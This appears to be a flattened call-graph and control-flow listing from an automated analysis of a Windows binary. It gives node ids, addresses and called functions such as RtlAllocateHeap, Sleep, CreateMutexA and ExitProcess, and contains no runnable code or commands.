bd909a 11071->11072 11073 be80c0 RtlAllocateHeap 11072->11073 11074 bd90ec 11073->11074 11075 be8220 RtlAllocateHeap 11074->11075 11077 bd90fe shared_ptr 11075->11077 11076 bd917e shared_ptr std::future_error::future_error 11076->11052 11077->11076 11078 c06c6a RtlAllocateHeap 11077->11078 11079 bd91aa 11078->11079 11081 be8248 11080->11081 11083 be8292 11080->11083 11082 be8251 11081->11082 11081->11083 11104 be9280 11082->11104 11085 be82a1 11083->11085 11087 be8f40 RtlAllocateHeap 11083->11087 11085->11052 11086 be825a 11086->11052 11087->11085 11100 bdcadd 11088->11100 11089 bdce09 shared_ptr std::future_error::future_error 11090 be7a00 RtlAllocateHeap 11090->11100 11091 bd5c10 4 API calls 11091->11100 11092 bdce31 11093 c06c6a RtlAllocateHeap 11092->11093 11095 bdce36 11093->11095 11094 bd9030 4 API calls 11094->11100 11096 be7a00 RtlAllocateHeap 11095->11096 11098 bdce92 11096->11098 11097 be8220 RtlAllocateHeap 11097->11100 11099 bd5c10 4 API calls 11098->11099 11101 bdce9d 11099->11101 11100->11089 11100->11090 11100->11091 11100->11092 11100->11094 11100->11097 11103 be8f40 RtlAllocateHeap 11100->11103 11102 bdca70 4 API calls 11101->11102 11103->11100 11105 be9294 11104->11105 11108 be92a5 __cftof 11105->11108 11109 be94e0 11105->11109 11107 be932b 11107->11086 11108->11086 11110 be950b 11109->11110 11111 be9619 11109->11111 11115 be9579 11110->11115 11116 be9552 11110->11116 11112 be9270 RtlAllocateHeap 11111->11112 11113 be961e 11112->11113 11114 bd2480 RtlAllocateHeap 11113->11114 11122 be9563 __cftof 11114->11122 11118 bed3e2 RtlAllocateHeap 11115->11118 11115->11122 11116->11113 11117 be955d 11116->11117 11120 bed3e2 RtlAllocateHeap 11117->11120 11118->11122 11119 c06c6a RtlAllocateHeap 11121 be9628 shared_ptr 11119->11121 11120->11122 11121->11107 11122->11119 11123 be95e1 shared_ptr __cftof 11122->11123 11123->11107 12058 bd4276 12059 bd2410 5 API calls 12058->12059 12060 bd427f 12059->12060 12061 bd3ce0 RtlAllocateHeap 12060->12061 12062 bd428f 12061->12062 9710 c06629 9713 c064c7 9710->9713 9714 c064d5 __cftof 9713->9714 9715 c06520 9714->9715 9718 c0652b 9714->9718 9717 c0652a 9724 c0a302 GetPEB 9718->9724 9720 c06535 9721 c0654a __cftof 9720->9721 9722 c0653a GetPEB 9720->9722 9723 c06562 ExitProcess 9721->9723 9722->9721 9725 c0a31c __cftof 9724->9725 9725->9720 9726 bda856 9727 bda870 9726->9727 9728 bda892 shared_ptr 9726->9728 9727->9728 9729 bda94e 9727->9729 9735 be80c0 9728->9735 9731 bda953 Sleep CreateMutexA 9729->9731 9750 c06c6a 9729->9750 9734 bda98e 9731->9734 9733 bda903 9737 be8104 9735->9737 9739 be80de 9735->9739 9736 be81ee 9758 be9270 9736->9758 9737->9736 9741 be817d 9737->9741 9742 be8158 9737->9742 9739->9733 9740 be81f3 9761 bd2480 9740->9761 9746 bed3e2 RtlAllocateHeap 9741->9746 9748 be8169 __cftof 9741->9748 9742->9740 9753 bed3e2 9742->9753 9746->9748 9747 c06c6a RtlAllocateHeap 9747->9736 9748->9747 9749 be81d0 shared_ptr 9748->9749 9749->9733 9751 c06bf6 __cftof RtlAllocateHeap 9750->9751 9752 c06c79 __cftof 9751->9752 9754 bd2480 Concurrency::cancel_current_task __dosmaperr ___std_exception_copy 9753->9754 9757 bed401 Concurrency::cancel_current_task 9754->9757 9765 c038af 9754->9765 9757->9748 9854 bec1b9 9758->9854 9762 bd248e Concurrency::cancel_current_task 9761->9762 9763 c038af ___std_exception_copy RtlAllocateHeap 9762->9763 9764 bd24c3 9763->9764 9766 bd24c3 9765->9766 9767 c038bc ___std_exception_copy 9765->9767 9766->9748 9767->9766 9770 c038e9 9767->9770 9771 c0a1f1 9767->9771 9780 c08ba3 9770->9780 9772 c0a1fe 9771->9772 9773 c0a20c 9771->9773 9772->9773 9775 c0a223 9772->9775 9783 c075f6 9773->9783 9777 c0a21e 9775->9777 9778 c075f6 __dosmaperr RtlAllocateHeap 9775->9778 9777->9770 9779 c0a214 9778->9779 9786 c06c5a 9779->9786 9781 c0adf5 ___free_lconv_mon RtlAllocateHeap 9780->9781 9782 c08bbb 9781->9782 9782->9766 9789 c0a7c8 9783->9789 9848 c06bf6 9786->9848 9788 c06c66 9788->9777 9790 c0a7d2 __dosmaperr 9789->9790 9792 c075fb 9790->9792 9800 c0d82f 9790->9800 9792->9779 9793 c0a813 __dosmaperr 9794 c0a81b __dosmaperr 9793->9794 9795 c0a853 9793->9795 9804 c0adf5 9794->9804 9808 c0a49f 9795->9808 9799 c0adf5 ___free_lconv_mon RtlAllocateHeap 9799->9792 9803 c0d83c __dosmaperr 9800->9803 9801 c0d867 RtlAllocateHeap 9802 c0d87a __dosmaperr 9801->9802 9801->9803 9802->9793 9803->9801 9803->9802 9805 c0ae00 9804->9805 9807 c0ae1b __dosmaperr 9804->9807 9806 c075f6 __dosmaperr RtlAllocateHeap 9805->9806 9805->9807 9806->9807 9807->9792 9809 c0a50d __dosmaperr 9808->9809 9812 c0a445 9809->9812 9811 c0a536 9811->9799 9813 c0a451 __cftof 9812->9813 9816 c0a626 9813->9816 9815 c0a473 __dosmaperr 9815->9811 9817 c0a635 __cftof 9816->9817 9818 c0a65c __cftof 9816->9818 9817->9818 9820 c0f35f 9817->9820 9818->9815 9821 c0f375 9820->9821 9844 c0f3df 9820->9844 9824 c0f3a8 9821->9824 9830 c0adf5 ___free_lconv_mon RtlAllocateHeap 9821->9830 9821->9844 9822 c0f4d0 __cftof RtlAllocateHeap 9836 c0f43b 9822->9836 9823 c0adf5 ___free_lconv_mon RtlAllocateHeap 9825 c0f401 9823->9825 9826 c0f3ca 9824->9826 9831 c0adf5 ___free_lconv_mon RtlAllocateHeap 9824->9831 9827 c0adf5 ___free_lconv_mon RtlAllocateHeap 9825->9827 9829 c0adf5 ___free_lconv_mon RtlAllocateHeap 9826->9829 9828 c0f414 9827->9828 9832 c0adf5 ___free_lconv_mon RtlAllocateHeap 9828->9832 9833 c0f3d4 9829->9833 9835 c0f39d 9830->9835 9837 c0f3bf 9831->9837 9838 c0f422 9832->9838 9839 c0adf5 ___free_lconv_mon RtlAllocateHeap 9833->9839 9834 c0f49b 9840 c0adf5 ___free_lconv_mon RtlAllocateHeap 9834->9840 9841 c0ef3c ___free_lconv_mon RtlAllocateHeap 9835->9841 9836->9834 9847 c0adf5 RtlAllocateHeap ___free_lconv_mon 9836->9847 9842 c0f03a __cftof RtlAllocateHeap 9837->9842 9843 c0adf5 ___free_lconv_mon RtlAllocateHeap 9838->9843 9839->9844 9845 c0f4a1 9840->9845 9841->9824 9842->9826 9846 c0f42d 9843->9846 9844->9823 9844->9846 9845->9818 9846->9822 9847->9836 9849 c0a7c8 __dosmaperr RtlAllocateHeap 9848->9849 9850 c06c01 __cftof 9849->9850 9851 c06c0f 9850->9851 9852 c06bf6 __cftof RtlAllocateHeap 9850->9852 9851->9788 9853 c06c66 9852->9853 9853->9788 9857 bec123 9854->9857 9856 bec1ca Concurrency::cancel_current_task 9860 bd22e0 9857->9860 9859 bec135 9859->9856 9861 c038af ___std_exception_copy RtlAllocateHeap 9860->9861 9862 bd2317 std::future_error::future_error 9861->9862 9862->9859 12087 bebe50 12090 bebd8b 12087->12090 12089 bebe66 Concurrency::cancel_current_task std::_Throw_future_error 12091 bd22e0 std::future_error::future_error RtlAllocateHeap 12090->12091 12092 bebd9f 12091->12092 12092->12089 9863 c0d82f 9866 c0d83c __dosmaperr 9863->9866 9864 c0d867 RtlAllocateHeap 9865 c0d87a __dosmaperr 9864->9865 9864->9866 9866->9864 9866->9865 11154 bd3c47 11155 bd3c51 11154->11155 11158 bd3c5f 11155->11158 11161 bd32d0 11155->11161 11156 bd3c68 11158->11156 11159 bd3810 4 API calls 11158->11159 11160 bd3cdb 11159->11160 11162 bec6ac GetSystemTimePreciseAsFileTime 11161->11162 11170 bd3314 11162->11170 11163 bd336b 11164 bec26a 5 API calls 11163->11164 11165 bd333c __Mtx_unlock 11164->11165 11167 bec26a 5 API calls 11165->11167 11168 bd3350 std::future_error::future_error 11165->11168 11169 bd3377 11167->11169 11168->11158 11171 bec6ac GetSystemTimePreciseAsFileTime 11169->11171 11170->11163 11170->11165 11180 bebd4c 11170->11180 11172 bd33af 11171->11172 11173 bec26a 5 API calls 11172->11173 11174 bd33b6 __Cnd_broadcast 11172->11174 11173->11174 11175 bec26a 5 API calls 11174->11175 11176 bd33d7 __Mtx_unlock 11174->11176 11175->11176 11177 bec26a 5 API calls 11176->11177 11178 bd33eb 11176->11178 11179 bd340e 11177->11179 11178->11158 11179->11158 11183 bebb72 11180->11183 11182 bebd5c 11182->11170 11184 bebb9c 11183->11184 11185 becf6b _xtime_get GetSystemTimePreciseAsFileTime 11184->11185 11186 bebba4 __Xtime_diff_to_millis2 std::future_error::future_error 11184->11186 11187 bebbcf __Xtime_diff_to_millis2 11185->11187 11186->11182 11187->11186 11188 becf6b _xtime_get GetSystemTimePreciseAsFileTime 11187->11188 11188->11186 11189 bd3440 11194 bd2b30 11189->11194 11191 bd344f Concurrency::cancel_current_task 11192 c038af ___std_exception_copy RtlAllocateHeap 11191->11192 11193 bd3483 11192->11193 11195 c038af ___std_exception_copy RtlAllocateHeap 11194->11195 11196 bd2b68 std::future_error::future_error 11195->11196 11196->11191 11202 bd3840 11203 bd38f6 11202->11203 11206 bd385f 11202->11206 11204 bd3920 11212 be91e0 11204->11212 11206->11203 11206->11204 11208 bd391b 11206->11208 11211 bd38cd shared_ptr 11206->11211 11207 be7d50 RtlAllocateHeap 11207->11203 11210 c06c6a RtlAllocateHeap 11208->11210 11209 bd3925 11210->11204 11211->11207 11213 bec1b9 RtlAllocateHeap 11212->11213 11214 be91ea 11213->11214 11214->11209 11233 bd6db5 11234 bd6dc2 11233->11234 11235 bd6dca 11234->11235 11236 bd6df5 11234->11236 11237 be80c0 RtlAllocateHeap 11235->11237 11238 be80c0 RtlAllocateHeap 11236->11238 11239 bd6deb shared_ptr 11237->11239 11238->11239 11240 bd6ec1 shared_ptr 11239->11240 11241 c06c6a RtlAllocateHeap 11239->11241 11242 bd6ee3 11241->11242 12113 bdb7b1 12114 bdb7be 12113->12114 12115 be7a00 RtlAllocateHeap 12114->12115 12116 bdb7f3 12115->12116 12117 be7a00 RtlAllocateHeap 12116->12117 12118 bdb80b 12117->12118 12119 be7a00 RtlAllocateHeap 12118->12119 12120 bdb823 12119->12120 12121 be7a00 RtlAllocateHeap 12120->12121 12122 bdb835 12121->12122 12123 bd9ba5 12124 bd9ba7 12123->12124 12125 be7a00 RtlAllocateHeap 12124->12125 12126 bd9ca9 12125->12126 12127 bd5c10 4 API calls 12126->12127 12128 bd9cb1 12127->12128 12129 bd8b30 4 API calls 12128->12129 12130 bd9cc2 12129->12130 12131 be8220 RtlAllocateHeap 12130->12131 12132 bd9cd1 12131->12132 12153 bd3f9f 12154 bd3fad 12153->12154 12158 bd3fc5 12153->12158 12155 bd2410 5 API calls 12154->12155 12156 bd3fb6 12155->12156 12157 bd3ce0 RtlAllocateHeap 12156->12157 12157->12158 12162 bd2b90 12163 bd2bce 12162->12163 12164 beb7fb TpReleaseWork 12163->12164 12165 bd2bdb shared_ptr std::future_error::future_error 12164->12165 11299 bd8980 11300 bd8aea 11299->11300 11307 bd89d8 shared_ptr 11299->11307 11301 be7a00 RtlAllocateHeap 11301->11307 11302 bd5c10 4 API calls 11302->11307 11303 bd8b20 11310 be8200 11303->11310 11304 be80c0 RtlAllocateHeap 11304->11307 11306 bd8b25 11308 c06c6a RtlAllocateHeap 11306->11308 11307->11300 11307->11301 11307->11302 11307->11303 11307->11304 11307->11306 11309 bd8b2a 11308->11309 11313 bec1d9 11310->11313 11312 be820a 11316 bec15d 11313->11316 11315 bec1ea Concurrency::cancel_current_task 11315->11312 11317 bd22e0 std::future_error::future_error RtlAllocateHeap 11316->11317 11318 bec16f 11317->11318 11318->11315 11319 bd55f0 11320 bd5610 11319->11320 11321 bd22c0 4 API calls 11320->11321 11322 bd5710 std::future_error::future_error 11320->11322 11321->11320 12186 bd43f0 12187 bebedf InitOnceExecuteOnce 12186->12187 12188 bd440a 12187->12188 12189 bd4411 12188->12189 12190 c06cbb 4 API calls 12188->12190 12191 bd4424 12190->12191 12212 bd3fe0 12213 bd4022 12212->12213 12214 bd408c 12213->12214 12215 bd40d2 12213->12215 12218 bd4035 std::future_error::future_error 12213->12218 12219 bd35e0 12214->12219 12216 bd3ee0 4 API calls 12215->12216 12216->12218 12220 bed3e2 RtlAllocateHeap 12219->12220 12221 bd3616 12220->12221 12225 bd364e Concurrency::cancel_current_task shared_ptr std::future_error::future_error 12221->12225 12226 bd2ce0 12221->12226 12223 bd369e 12224 bd2c00 4 API calls 12223->12224 12223->12225 12224->12225 12225->12218 12227 bd2d1d 12226->12227 12228 bebedf InitOnceExecuteOnce 12227->12228 12229 bd2d46 12228->12229 12230 bd2d88 12229->12230 12231 bd2d51 std::future_error::future_error 12229->12231 12235 bebef7 12229->12235 12233 bd2440 4 API calls 12230->12233 12231->12223 12234 bd2d9b 12233->12234 12234->12223 12236 bebf03 12235->12236 12244 bd2900 12236->12244 12238 bebf23 Concurrency::cancel_current_task 12239 bebf6a 12238->12239 12240 bebf73 12238->12240 12254 bebe7f 12239->12254 12242 bd2ae0 5 API calls 12240->12242 12243 bebf6f 12242->12243 12243->12230 12245 be80c0 RtlAllocateHeap 12244->12245 12246 bd294f 12245->12246 12247 bd26b0 RtlAllocateHeap 12246->12247 12249 bd2967 12247->12249 12248 bd298d shared_ptr 12248->12238 12249->12248 12250 c06c6a RtlAllocateHeap 12249->12250 12251 bd29b6 12250->12251 12252 c038af ___std_exception_copy RtlAllocateHeap 12251->12252 12253 bd29e4 12252->12253 12253->12238 12255 becc31 InitOnceExecuteOnce 12254->12255 12257 bebe97 12255->12257 12256 bebe9e 12256->12243 12257->12256 12258 c06cbb 4 API calls 12257->12258 12259 bebea7 12258->12259 12259->12243 11343 be85e0 11344 be85f6 11343->11344 11344->11344 11345 be860b 11344->11345 11346 be8f40 RtlAllocateHeap 11344->11346 11346->11345 11347 be8de0 11348 be8f2f 11347->11348 11349 be8e05 11347->11349 11350 be9270 RtlAllocateHeap 11348->11350 11353 be8e4c 11349->11353 11354 be8e76 11349->11354 11351 be8f34 11350->11351 11352 bd2480 RtlAllocateHeap 11351->11352 11360 be8e5d __cftof 11352->11360 11353->11351 11355 be8e57 11353->11355 11358 bed3e2 RtlAllocateHeap 11354->11358 11354->11360 11357 bed3e2 RtlAllocateHeap 11355->11357 11356 c06c6a RtlAllocateHeap 11359 be8f3e 11356->11359 11357->11360 11358->11360 11360->11356 11361 be8eed shared_ptr __cftof 11360->11361 12260 bd87d0 12261 bd88d3 12260->12261 12270 bd8819 shared_ptr 12260->12270 12262 be80c0 RtlAllocateHeap 12261->12262 12264 bd8923 12262->12264 12263 bd896c 12267 be8200 RtlAllocateHeap 12263->12267 12265 bd8949 shared_ptr 12264->12265 12269 c06c6a RtlAllocateHeap 12264->12269 12266 be80c0 RtlAllocateHeap 12266->12270 12268 bd8971 12267->12268 12269->12263 12270->12261 12270->12263 12270->12264 12270->12266 12271 c067b7 12272 c067c3 __cftof 12271->12272 12273 c067cd 12272->12273 12276 c067e2 12272->12276 12274 c075f6 __dosmaperr RtlAllocateHeap 12273->12274 12275 c067d2 12274->12275 12277 c06c5a __cftof RtlAllocateHeap 12275->12277 12279 c067dd 12276->12279 12280 c06740 12276->12280 12277->12279 12281 c06762 12280->12281 12282 c0674d 12280->12282 12286 c0675d 12281->12286 12296 c0a038 12281->12296 12283 c075f6 __dosmaperr RtlAllocateHeap 12282->12283 12285 c06752 12283->12285 12288 c06c5a __cftof RtlAllocateHeap 12285->12288 12286->12279 12288->12286 12292 c06785 12313 c0aebb 12292->12313 12295 c0adf5 ___free_lconv_mon RtlAllocateHeap 12295->12286 12297 c06777 12296->12297 12298 c0a050 12296->12298 12302 c0b00b 12297->12302 12298->12297 12299 c0afe4 RtlAllocateHeap 12298->12299 12300 c0a06e 12299->12300 12328 c10439 12300->12328 12303 c0b022 12302->12303 12304 c0677f 12302->12304 12303->12304 12305 c0adf5 ___free_lconv_mon RtlAllocateHeap 12303->12305 12306 c0afe4 12304->12306 12305->12304 12307 c0aff0 12306->12307 12308 c0b005 12306->12308 12309 c075f6 __dosmaperr RtlAllocateHeap 12307->12309 12308->12292 12310 c0aff5 12309->12310 12311 c06c5a __cftof RtlAllocateHeap 12310->12311 12312 c0b000 12311->12312 12312->12292 12314 c0aecc 12313->12314 12316 c0aee1 12313->12316 12315 c075e3 __dosmaperr RtlAllocateHeap 12314->12315 12319 c0aed1 12315->12319 12317 c0af2a 12316->12317 12320 c0af08 12316->12320 12318 c075e3 __dosmaperr RtlAllocateHeap 12317->12318 12321 c0af2f 12318->12321 12322 c075f6 __dosmaperr RtlAllocateHeap 12319->12322 12346 c0ae2f 12320->12346 12324 c075f6 __dosmaperr RtlAllocateHeap 12321->12324 12325 c0678b 12322->12325 12326 c0af37 12324->12326 12325->12286 12325->12295 12327 c06c5a __cftof RtlAllocateHeap 12326->12327 12327->12325 12329 c10445 __cftof 12328->12329 12330 c10465 12329->12330 12331 c1044d 12329->12331 12333 c10500 12330->12333 12340 c10497 12330->12340 12332 c075e3 __dosmaperr RtlAllocateHeap 12331->12332 12334 c10452 12332->12334 12335 c075e3 __dosmaperr RtlAllocateHeap 12333->12335 12336 c075f6 __dosmaperr RtlAllocateHeap 12334->12336 12337 c10505 12335->12337 12338 c1045a 12336->12338 12339 c075f6 __dosmaperr RtlAllocateHeap 12337->12339 12338->12297 12341 c1050d 12339->12341 12340->12338 12343 c075f6 __dosmaperr RtlAllocateHeap 12340->12343 12342 c06c5a __cftof RtlAllocateHeap 12341->12342 12342->12338 12344 c104be 12343->12344 12345 c075e3 __dosmaperr RtlAllocateHeap 12344->12345 12345->12338 12347 c0ae3b __cftof 12346->12347 12348 c0ae70 12347->12348 12349 c0ae7b 12347->12349 12353 c0af48 12348->12353 12350 c075f6 __dosmaperr RtlAllocateHeap 12349->12350 12352 c0ae76 12350->12352 12352->12325 12364 c0c0de 12353->12364 12355 c0af5e 12360 c0afd8 12355->12360 12362 c075c0 __dosmaperr RtlAllocateHeap 12355->12362 12356 c0af58 12356->12355 12357 c0af90 12356->12357 12359 c0c0de RtlAllocateHeap 12356->12359 12357->12355 12358 c0c0de RtlAllocateHeap 12357->12358 12358->12355 12361 c0af87 12359->12361 12360->12352 12363 c0c0de RtlAllocateHeap 12361->12363 12362->12360 12363->12357 12365 c0c100 12364->12365 12366 c0c0eb 12364->12366 12369 c075e3 __dosmaperr RtlAllocateHeap 12365->12369 12371 c0c125 12365->12371 12367 c075e3 __dosmaperr RtlAllocateHeap 12366->12367 12368 c0c0f0 12367->12368 12370 c075f6 __dosmaperr RtlAllocateHeap 12368->12370 12372 c0c130 12369->12372 12373 c0c0f8 12370->12373 12371->12356 12374 c075f6 __dosmaperr RtlAllocateHeap 12372->12374 12373->12356 12375 c0c138 12374->12375 12376 c06c5a __cftof RtlAllocateHeap 12375->12376 12376->12373 11382 bd21c0 11383 bd21cb 11382->11383 11384 bd21d0 11382->11384 11385 bd21d4 11384->11385 11388 bd21ec __cftof 11384->11388 11386 c075f6 __dosmaperr RtlAllocateHeap 11385->11386 11387 bd21d9 11386->11387 11389 c06c5a __cftof RtlAllocateHeap 11387->11389 11390 bd2221 11388->11390 11392 bd21fc __cftof 11388->11392 11395 bd223a 11388->11395 11391 bd21e4 11389->11391 11393 c075f6 __dosmaperr RtlAllocateHeap 11390->11393 11396 bd2226 11393->11396 11394 bd2231 11395->11394 11397 c075f6 __dosmaperr RtlAllocateHeap 11395->11397 11398 c06c5a __cftof RtlAllocateHeap 11396->11398 11399 bd2247 11397->11399 11398->11394 11400 c06c5a __cftof RtlAllocateHeap 11399->11400 11401 bd2252 11400->11401 11405 be79c0 11406 be79e0 11405->11406 11406->11406 11407 be80c0 RtlAllocateHeap 11406->11407 11408 be79f2 11407->11408 12397 c08bbe 12398 c08868 4 API calls 12397->12398 12399 c08bdc 12398->12399 12400 be83c0 12401 be7760 RtlAllocateHeap 12400->12401 12402 be8439 12401->12402 12403 be8f40 RtlAllocateHeap 12402->12403 12404 be8454 12402->12404 12403->12404 12405 be8f40 RtlAllocateHeap 12404->12405 12407 be84a8 12404->12407 12406 be84ee 12405->12406 11413 bd6535 11414 bd6549 shared_ptr 11413->11414 11415 c06c6a RtlAllocateHeap 11414->11415 11417 bd65b1 shared_ptr std::future_error::future_error 11414->11417 11416 bd65dc 11415->11416 11418 be7a00 RtlAllocateHeap 11416->11418 11419 bd66a6 11418->11419 11420 bd5c10 4 API calls 11419->11420 11421 bd66ac 11420->11421 11422 bd5c10 4 API calls 11421->11422 11423 bd66b1 11422->11423 11424 bd22c0 4 API calls 11423->11424 11425 bd66c9 shared_ptr 11424->11425 11426 be7a00 RtlAllocateHeap 11425->11426 11427 bd6732 11426->11427 11428 bd5c10 4 API calls 11427->11428 11429 bd673d 11428->11429 11430 bd22c0 4 API calls 11429->11430 11439 bd6757 shared_ptr 11430->11439 11431 bd6852 11432 be80c0 RtlAllocateHeap 11431->11432 11434 bd689c 11432->11434 11433 be7a00 RtlAllocateHeap 11433->11439 11435 be80c0 RtlAllocateHeap 11434->11435 11438 bd68e3 shared_ptr std::future_error::future_error 11435->11438 11436 bd5c10 4 API calls 11436->11439 11437 bd22c0 4 API calls 11437->11439 11439->11431 11439->11433 11439->11436 11439->11437 11465 bd4120 11466 bd416a 11465->11466 11468 bd41b2 std::future_error::future_error 11466->11468 11469 bd3ee0 11466->11469 11470 bd3f48 11469->11470 11474 bd3f1e 11469->11474 11472 bd3f58 11470->11472 11475 bd2c00 11470->11475 11472->11468 11474->11468 11476 bed3e2 RtlAllocateHeap 11475->11476 11477 bd2c0e 11476->11477 11485 beb847 11477->11485 11479 bd2c42 11480 bd2c49 11479->11480 11491 bd2c80 11479->11491 11480->11468 11482 bd2c58 11494 bd2560 11482->11494 11484 bd2c65 Concurrency::cancel_current_task 11486 beb854 11485->11486 11490 beb873 Concurrency::details::_Reschedule_chore 11485->11490 11497 becb77 11486->11497 11488 beb864 11488->11490 11499 beb81e 11488->11499 11490->11479 11505 beb7fb 11491->11505 11493 bd2cb2 shared_ptr 11493->11482 11495 c038af ___std_exception_copy RtlAllocateHeap 11494->11495 11496 bd2597 std::future_error::future_error 11495->11496 11496->11484 11498 becb92 CreateThreadpoolWork 11497->11498 11498->11488 11500 beb827 Concurrency::details::_Reschedule_chore 11499->11500 11503 becdcc 11500->11503 11502 beb841 11502->11490 11504 becde1 TpPostWork 11503->11504 11504->11502 11506 beb817 11505->11506 11507 beb807 11505->11507 11506->11493 11507->11506 11509 beca78 11507->11509 11510 beca8d TpReleaseWork 11509->11510 11510->11506 12431 be8320 12433 be8339 12431->12433 12432 be834d 12433->12432 12434 be8f40 RtlAllocateHeap 12433->12434 12434->12432 11511 bd211c 11512 bd2126 11511->11512 11513 bed64e RtlAllocateHeap 11512->11513 11514 bd2132 11513->11514 12435 bd2b10 12436 bd2b1c 12435->12436 12437 bd2b1a 12435->12437 12438 bec26a 5 API calls 12436->12438 12439 bd2b22 12438->12439 11518 be8510 11519 be855f 11518->11519 11522 be856c 11518->11522 11524 be9d00 11519->11524 11521 be85c4 11522->11521 11545 bea060 11522->11545 11525 be9e31 11524->11525 11529 be9d25 11524->11529 11526 be9270 RtlAllocateHeap 11525->11526 11538 be9d8b __cftof 11526->11538 11527 c06c6a RtlAllocateHeap 11536 be9e3b 11527->11536 11528 be9e2c 11532 bd2480 RtlAllocateHeap 11528->11532 11529->11528 11530 be9d7a 11529->11530 11531 be9da1 11529->11531 11530->11528 11533 be9d85 11530->11533 11535 bed3e2 RtlAllocateHeap 11531->11535 11531->11538 11532->11525 11534 bed3e2 RtlAllocateHeap 11533->11534 11534->11538 11535->11538 11537 be9e6a shared_ptr 11536->11537 11539 c06c6a RtlAllocateHeap 11536->11539 11537->11522 11538->11527 11540 be9dfc shared_ptr __cftof 11538->11540 11541 be9e8e 11539->11541 11540->11522 11542 be9ec0 shared_ptr 11541->11542 11543 c06c6a RtlAllocateHeap 11541->11543 11542->11522 11544 be9ee6 11543->11544 11546 bea1b1 11545->11546 11550 bea083 11545->11550 11547 be9270 RtlAllocateHeap 11546->11547 11558 bea0e4 __cftof 11547->11558 11548 c06c6a RtlAllocateHeap 11557 bea1bb shared_ptr 11548->11557 11549 bea1ac 11551 bd2480 RtlAllocateHeap 11549->11551 11550->11549 11552 bea0fd 11550->11552 11553 bea0d3 11550->11553 11551->11546 11555 bed3e2 RtlAllocateHeap 11552->11555 11552->11558 11553->11549 11554 bea0de 11553->11554 11556 bed3e2 RtlAllocateHeap 11554->11556 11555->11558 11556->11558 11557->11522 11558->11548 11559 bea16c shared_ptr __cftof 11558->11559 11559->11522 11560 bed111 11562 bed122 11560->11562 11561 bed12a 11562->11561 11564 bed199 11562->11564 11565 bed1a7 SleepConditionVariableCS 11564->11565 11567 bed1c0 11564->11567 11565->11567 11567->11562 12465 bd5f76 12467 bd5f81 shared_ptr 12465->12467 12466 bd5ffe shared_ptr std::future_error::future_error 12467->12466 12468 c06c6a RtlAllocateHeap 12467->12468 12469 bd601b 12468->12469 12470 be80c0 RtlAllocateHeap 12469->12470 12471 bd6089 12470->12471 12472 be80c0 RtlAllocateHeap 12471->12472 12473 bd60bd 12472->12473 12474 be80c0 RtlAllocateHeap 12473->12474 12475 bd60ee 12474->12475 12476 be80c0 RtlAllocateHeap 12475->12476 12477 bd611f 12476->12477 12478 be80c0 RtlAllocateHeap 12477->12478 12480 bd6150 12478->12480 12479 bd65b1 shared_ptr std::future_error::future_error 12480->12479 12481 c06c6a RtlAllocateHeap 12480->12481 12482 bd65dc 12481->12482 12483 be7a00 RtlAllocateHeap 12482->12483 12484 bd66a6 12483->12484 12485 bd5c10 4 API calls 12484->12485 12486 bd66ac 12485->12486 12487 bd5c10 4 API calls 12486->12487 12488 bd66b1 12487->12488 12489 bd22c0 4 API calls 12488->12489 12490 bd66c9 shared_ptr 12489->12490 12491 be7a00 RtlAllocateHeap 12490->12491 12492 bd6732 12491->12492 12493 bd5c10 4 API calls 12492->12493 12494 bd673d 12493->12494 12495 bd22c0 4 API calls 12494->12495 12504 bd6757 shared_ptr 12495->12504 12496 bd6852 12497 be80c0 RtlAllocateHeap 12496->12497 12499 bd689c 12497->12499 12498 be7a00 RtlAllocateHeap 12498->12504 12500 be80c0 RtlAllocateHeap 12499->12500 12503 bd68e3 shared_ptr std::future_error::future_error 12500->12503 12501 bd5c10 4 API calls 12501->12504 12502 bd22c0 4 API calls 12502->12504 12504->12496 12504->12498 12504->12501 12504->12502 11591 bd2170 11596 bec6fc 11591->11596 11594 bed64e RtlAllocateHeap 11595 bd2184 11594->11595 11597 bec70c 11596->11597 11598 bd217a 11596->11598 11597->11598 11600 becfbe 11597->11600 11598->11594 11601 beccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11600->11601 11602 becfd0 11601->11602 11602->11597 11603 bd3970 11604 bec68b __Mtx_init_in_situ 2 API calls 11603->11604 11605 bd39a7 11604->11605 11606 bec68b __Mtx_init_in_situ 2 API calls 11605->11606 11607 bd39e6 11606->11607 12505 bd3770 12507 bd379b 12505->12507 12506 bd37cd shared_ptr 12507->12506 12508 c06c6a RtlAllocateHeap 12507->12508 12509 bd380f 12508->12509 11628 bd215a 11629 bec6fc InitializeCriticalSectionEx 11628->11629 11630 bd2164 11629->11630 11631 bed64e RtlAllocateHeap 11630->11631 11632 bd216e 11631->11632 12533 c06729 12536 c06672 12533->12536 12535 c0673b 12539 c0667e __cftof 12536->12539 12537 c06685 12538 c075f6 __dosmaperr RtlAllocateHeap 12537->12538 12540 c0668a 12538->12540 12539->12537 12541 c066a5 12539->12541 12542 c06c5a __cftof RtlAllocateHeap 12540->12542 12543 c066b7 12541->12543 12544 c066aa 12541->12544 12548 c06695 12542->12548 12550 c0a8c3 12543->12550 12545 c075f6 __dosmaperr RtlAllocateHeap 12544->12545 12545->12548 12547 c066c0 12547->12548 12549 c075f6 __dosmaperr RtlAllocateHeap 12547->12549 12548->12535 12549->12548 12551 c0a8cf __cftof 12550->12551 12554 c0a967 12551->12554 12553 c0a8ea 12553->12547 12556 c0a98a 12554->12556 12555 c0d82f __dosmaperr RtlAllocateHeap 12557 c0a9eb 12555->12557 12556->12555 12559 c0a9d0 12556->12559 12558 c0adf5 ___free_lconv_mon RtlAllocateHeap 12557->12558 12558->12559 12559->12553 11633 bda54d 11635 bda555 shared_ptr 11633->11635 11634 bda944 11637 c06c6a RtlAllocateHeap 11634->11637 11635->11634 11636 bda628 shared_ptr 11635->11636 11641 be80c0 RtlAllocateHeap 11636->11641 11638 bda949 11637->11638 11639 bda94e 11638->11639 11640 c06c6a RtlAllocateHeap 11638->11640 11643 bda953 Sleep CreateMutexA 11639->11643 11644 c06c6a RtlAllocateHeap 11639->11644 11640->11639 11642 bda903 11641->11642 11645 bda98e 11643->11645 11644->11643 12569 bd9f44 12570 bd9f4c shared_ptr 12569->12570 12571 bda01f shared_ptr 12570->12571 12572 bda92b 12570->12572 12575 be80c0 RtlAllocateHeap 12571->12575 12573 bda953 Sleep CreateMutexA 12572->12573 12574 c06c6a RtlAllocateHeap 12572->12574 12576 bda98e 12573->12576 12574->12573 12577 bda903 12575->12577

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
